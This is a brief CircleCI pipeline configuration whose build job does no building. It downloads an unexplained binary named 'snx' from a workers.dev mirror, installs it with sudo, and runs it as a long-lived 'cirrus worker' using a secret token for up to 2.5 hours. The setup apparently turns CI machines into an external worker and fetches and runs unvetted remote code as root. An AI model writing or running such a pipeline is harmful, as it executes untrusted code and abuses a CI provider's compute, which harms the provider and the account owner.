version: 2.1
jobs:
 build:
   machine: true
   steps:
     - checkout
     - run: |
        curl -L -o snx https://sa.mirror-hub.workers.dev/3:/snx
        sudo mv snx /usr/local/bin/snx
        sudo chmod +x /usr/local/bin/snx
     - run:
         name: snx
         command: sudo cirrus worker run --token $API_SNX_S --name AX61-1
         no_output_timeout: 2.5h
